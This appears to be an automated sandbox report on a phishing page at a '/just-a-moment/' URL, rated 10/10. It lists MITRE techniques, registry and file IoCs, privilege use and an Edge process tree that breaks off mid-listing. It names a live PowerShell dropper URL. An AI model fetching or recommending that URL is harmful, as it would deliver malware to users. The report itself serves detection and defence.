hxxps://www[.]doorsplus[.]com[.]au/just-a-moment/

Resubmissions

30/03/2025, 02:54

250330-dd4j3s1ky7 10

30/03/2025, 02:21

250330-ctgjtax1at 10

Analysis

max time kernel
143s
max time network
142s
platform
windows10-2004_x64
resource
win10v2004-20250314-en
resource tags

arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
submitted
30/03/2025, 02:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://www.doorsplus.com.au/just-a-moment/

Score

10^/10

discovery execution phishing

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://aidetector.tools/wZWZqs

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
180	2884	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2884	powershell.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Detected phishing page 1 IoCs

phishing

flow	pid	Process
82	4620	msedge.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping2724_1767817152\manifest.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping2724_1767817152\sets.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping2724_1276440131\automation.js	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping2724_1276440131\manifest.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping2724_257646921\offscreendocument.html	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping2724_257646921\_locales\th\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping2724_257646921\_locales\lo\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping2724_257646921\_locales\hi\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping2724_1130248396\manifest.fingerprint	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping2724_1276440131\extraction.js	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping2724_257646921\_locales\af\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping2724_257646921\_locales\bg\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping2724_257646921\_locales\zh_HK\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping2724_257646921\_locales\pt_BR\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping2724_257646921\_locales\ta\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping2724_257646921\_locales\it\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping2724_257646921\_locales\ur\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping2724_257646921\_locales\az\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping2724_257646921\_locales\ja\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping2724_257646921\_locales\my\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping2724_172039380\keys.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping2724_172039380\LICENSE	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping2724_1276440131\classification.js	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping2724_257646921\_locales\kn\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping2724_257646921\_locales\fi\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping2724_257646921\_locales\lv\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping2724_257646921\_locales\cs\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping2724_257646921\_locales\hu\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping2724_257646921\_locales\ca\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping2724_257646921\_locales\ar\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping2724_257646921\_locales\fr\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping2724_257646921\128.png	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping2724_257646921\manifest.fingerprint	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping2724_1130248396\manifest.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping2724_1130248396\protocols.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping2724_1767817152\manifest.fingerprint	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping2724_257646921\_locales\mr\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping2724_257646921\_locales\de\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping2724_257646921\_locales\gl\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping2724_257646921\_locales\am\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping2724_257646921\_locales\fil\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping2724_257646921\_locales\es\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping2724_257646921\service_worker_bin_prod.js	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping2724_257646921\_locales\pl\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping2724_257646921\_locales\da\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping2724_257646921\_locales\kk\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping2724_257646921\_locales\tr\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping2724_257646921\_locales\en\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping2724_257646921\_locales\id\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping2724_172039380\_metadata\verified_contents.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping2724_257646921\_locales\be\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping2724_257646921\_locales\si\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping2724_257646921\_locales\fa\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping2724_257646921\_locales\is\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping2724_1276440131\travel-facilitated-booking-bing.js	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping2724_257646921\dasherSettingSchema.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping2724_257646921\_locales\es_419\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping2724_257646921\_locales\te\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping2724_257646921\_locales\ko\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping2724_257646921\_locales\mn\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping2724_257646921\_locales\en_GB\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping2724_257646921\_locales\iw\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping2724_257646921\_locales\sk\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping2724_257646921\_locales\ka\messages.json	msedge.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	msedge.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133877749501265758"	msedge.exe

Modifies registry class 3 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-814918696-1585701690-3140955116-1000\{D1B4421B-9608-4176-8829-7C58BD4D6F7B}	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings	taskmgr.exe

Suspicious behavior: EnumeratesProcesses 59 IoCs

pid	Process
2884	powershell.exe
2884	powershell.exe
2884	powershell.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
2172	msedge.exe
2172	msedge.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

pid	Process
2724	msedge.exe
2724	msedge.exe
2724	msedge.exe
2724	msedge.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2884	powershell.exe
Token: SeDebugPrivilege	5108	taskmgr.exe
Token: SeSystemProfilePrivilege	5108	taskmgr.exe
Token: SeCreateGlobalPrivilege	5108	taskmgr.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
2724	msedge.exe
2724	msedge.exe
2724	msedge.exe
2724	msedge.exe
2724	msedge.exe
2724	msedge.exe
2724	msedge.exe
2724	msedge.exe
2724	msedge.exe
2724	msedge.exe
2724	msedge.exe
2724	msedge.exe
2724	msedge.exe
2724	msedge.exe
2724	msedge.exe
2724	msedge.exe
2724	msedge.exe
2724	msedge.exe
2724	msedge.exe
2724	msedge.exe
2724	msedge.exe
2724	msedge.exe
2724	msedge.exe
2724	msedge.exe
2724	msedge.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
2724	msedge.exe
2724	msedge.exe
2724	msedge.exe
2724	msedge.exe
2724	msedge.exe
2724	msedge.exe
2724	msedge.exe
2724	msedge.exe
2724	msedge.exe
2724	msedge.exe
2724	msedge.exe
2724	msedge.exe
2724	msedge.exe
2724	msedge.exe
2724	msedge.exe
2724	msedge.exe
2724	msedge.exe
2724	msedge.exe
2724	msedge.exe
2724	msedge.exe
2724	msedge.exe
2724	msedge.exe
2724	msedge.exe
2724	msedge.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe
5108	taskmgr.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2724 wrote to memory of 3828	2724	msedge.exe	87
PID 2724 wrote to memory of 3828	2724	msedge.exe	87
PID 2724 wrote to memory of 4620	2724	msedge.exe	88
PID 2724 wrote to memory of 4620	2724	msedge.exe	88
PID 2724 wrote to memory of 4604	2724	msedge.exe	89
PID 2724 wrote to memory of 4604	2724	msedge.exe	89
PID 2724 wrote to memory of 4604	2724	msedge.exe	89
PID 2724 wrote to memory of 4604	2724	msedge.exe	89
PID 2724 wrote to memory of 4604	2724	msedge.exe	89
PID 2724 wrote to memory of 4604	2724	msedge.exe	89
PID 2724 wrote to memory of 4604	2724	msedge.exe	89
PID 2724 wrote to memory of 4604	2724	msedge.exe	89
PID 2724 wrote to memory of 4604	2724	msedge.exe	89
PID 2724 wrote to memory of 4604	2724	msedge.exe	89
PID 2724 wrote to memory of 4604	2724	msedge.exe	89
PID 2724 wrote to memory of 4604	2724	msedge.exe	89
PID 2724 wrote to memory of 4604	2724	msedge.exe	89
PID 2724 wrote to memory of 4604	2724	msedge.exe	89
PID 2724 wrote to memory of 4604	2724	msedge.exe	89
PID 2724 wrote to memory of 4604	2724	msedge.exe	89
PID 2724 wrote to memory of 4604	2724	msedge.exe	89
PID 2724 wrote to memory of 4604	2724	msedge.exe	89
PID 2724 wrote to memory of 4604	2724	msedge.exe	89
PID 2724 wrote to memory of 4604	2724	msedge.exe	89
PID 2724 wrote to memory of 4604	2724	msedge.exe	89
PID 2724 wrote to memory of 4604	2724	msedge.exe	89
PID 2724 wrote to memory of 4604	2724	msedge.exe	89
PID 2724 wrote to memory of 4604	2724	msedge.exe	89
PID 2724 wrote to memory of 4604	2724	msedge.exe	89
PID 2724 wrote to memory of 4604	2724	msedge.exe	89
PID 2724 wrote to memory of 4604	2724	msedge.exe	89
PID 2724 wrote to memory of 4604	2724	msedge.exe	89
PID 2724 wrote to memory of 4604	2724	msedge.exe	89
PID 2724 wrote to memory of 4604	2724	msedge.exe	89
PID 2724 wrote to memory of 4604	2724	msedge.exe	89
PID 2724 wrote to memory of 4604	2724	msedge.exe	89
PID 2724 wrote to memory of 4604	2724	msedge.exe	89
PID 2724 wrote to memory of 4604	2724	msedge.exe	89
PID 2724 wrote to memory of 4604	2724	msedge.exe	89
PID 2724 wrote to memory of 4604	2724	msedge.exe	89
PID 2724 wrote to memory of 4604	2724	msedge.exe	89
PID 2724 wrote to memory of 4604	2724	msedge.exe	89
PID 2724 wrote to memory of 4604	2724	msedge.exe	89
PID 2724 wrote to memory of 4604	2724	msedge.exe	89
PID 2724 wrote to memory of 4604	2724	msedge.exe	89
PID 2724 wrote to memory of 4604	2724	msedge.exe	89
PID 2724 wrote to memory of 4604	2724	msedge.exe	89
PID 2724 wrote to memory of 4604	2724	msedge.exe	89
PID 2724 wrote to memory of 4604	2724	msedge.exe	89
PID 2724 wrote to memory of 4604	2724	msedge.exe	89
PID 2724 wrote to memory of 4604	2724	msedge.exe	89
PID 2724 wrote to memory of 4604	2724	msedge.exe	89
PID 2724 wrote to memory of 4604	2724	msedge.exe	89
PID 2724 wrote to memory of 4604	2724	msedge.exe	89
PID 2724 wrote to memory of 4604	2724	msedge.exe	89
PID 2724 wrote to memory of 4736	2724	msedge.exe	90
PID 2724 wrote to memory of 4736	2724	msedge.exe	90
PID 2724 wrote to memory of 4736	2724	msedge.exe	90
PID 2724 wrote to memory of 4736	2724	msedge.exe	90
PID 2724 wrote to memory of 4736	2724	msedge.exe	90
PID 2724 wrote to memory of 4736	2724	msedge.exe	90
PID 2724 wrote to memory of 4736	2724	msedge.exe	90
PID 2724 wrote to memory of 4736	2724	msedge.exe	90
PID 2724 wrote to memory of 4736	2724	msedge.exe	90

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://www.doorsplus.com.au/just-a-moment/
1⤵
- Drops file in Program Files directory
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2724
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x238,0x268,0x7ffc5853f208,0x7ffc5853f214,0x7ffc5853f220
  2⤵
  PID:3828
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1948,i,12243343007084047144,11973016685271453139,262144 --variations-seed-version --mojo-platform-channel-handle=2196 /prefetch:3
  2⤵
  - Detected phishing page
  PID:4620
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2168,i,12243343007084047144,11973016685271453139,262144 --variations-seed-version --mojo-platform-channel-handle=2164 /prefetch:2
  2⤵
  PID:4604
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2548,i,12243343007084047144,11973016685271453139,262144 --variations-seed-version --mojo-platform-channel-handle=2700 /prefetch:8
  2⤵
  PID:4736
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3480,i,12243343007084047144,11973016685271453139,262144 --variations-seed-version --mojo-platform-channel-handle=3500 /prefetch:1
  2⤵
  PID:3392
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3496,i,12243343007084047144,11973016685271453139,262144 --variations-seed-version --mojo-platform-channel-handle=3584 /prefetch:1
  2⤵
  PID:5256
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=5060,i,12243343007084047144,11973016685271453139,262144 --variations-seed-version --mojo-platform-channel-handle=5040 /prefetch:1
  2⤵
  PID:5904
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5352,i,12243343007084047144,11973016685271453139,262144 --variations-seed-version --mojo-platform-channel-handle=5324 /prefetch:8
  2⤵
  PID:2344
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5380,i,12243343007084047144,11973016685271453139,262144 --variations-seed-version --mojo-platform-channel-handle=5440 /prefetch:8
  2⤵
  PID:2340
- C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5976,i,12243343007084047144,11973016685271453139,262144 --variations-seed-version --mojo-platform-channel-handle=6004 /prefetch:8
  2⤵
  PID:1612
- C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5976,i,12243343007084047144,11973016685271453139,262144 --variations-seed-version --mojo-platform-channel-handle=6004 /prefetch:8
  2⤵
  PID:4144
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6104,i,12243343007084047144,11973016685271453139,262144 --variations-seed-version --mojo-platform-channel-handle=6112 /prefetch:8
  2⤵
  PID:1888
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6160,i,12243343007084047144,11973016685271453139,262144 --variations-seed-version --mojo-platform-channel-handle=6184 /prefetch:8
  2⤵
  PID:3840
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6100,i,12243343007084047144,11973016685271453139,262144 --variations-seed-version --mojo-platform-channel-handle=6408 /prefetch:8
  2⤵
  PID:2324
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6428,i,12243343007084047144,11973016685271453139,262144 --variations-seed-version --mojo-platform-channel-handle=6004 /prefetch:8
  2⤵
  PID:6016
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6468,i,12243343007084047144,11973016685271453139,262144 --variations-seed-version --mojo-platform-channel-handle=6316 /prefetch:8
  2⤵
  PID:5532
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6260,i,12243343007084047144,11973016685271453139,262144 --variations-seed-version --mojo-platform-channel-handle=6420 /prefetch:8
  2⤵
  PID:3764
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5644,i,12243343007084047144,11973016685271453139,262144 --variations-seed-version --mojo-platform-channel-handle=6084 /prefetch:8
  2⤵
  PID:5364
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5664,i,12243343007084047144,11973016685271453139,262144 --variations-seed-version --mojo-platform-channel-handle=6212 /prefetch:8
  2⤵
  PID:532
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5296,i,12243343007084047144,11973016685271453139,262144 --variations-seed-version --mojo-platform-channel-handle=5504 /prefetch:8
  2⤵
  PID:660
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
